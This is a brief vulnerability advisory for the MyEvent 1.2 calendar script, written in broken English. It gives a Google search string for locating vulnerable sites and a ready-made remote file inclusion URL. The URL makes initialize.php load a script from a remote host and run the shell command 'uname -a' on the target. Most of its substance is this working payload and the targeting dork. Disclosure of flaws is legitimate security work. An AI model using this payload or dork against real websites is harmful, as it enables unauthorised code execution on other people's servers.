Website : http://mywebland.com/
Script : MyEvent
Version : 1.2
Risk : High
Class : Remote
Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends
Google look for :) = "MyEvent 1.2 " or "/calendar/myevent.php"
I. Remote Code Execution
This is script to very big high it bug being found.
http://www.site.com/[path]/initialize.php?myevent_path=http://www.site.c
om/x.txt?&cmd=uname -a
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.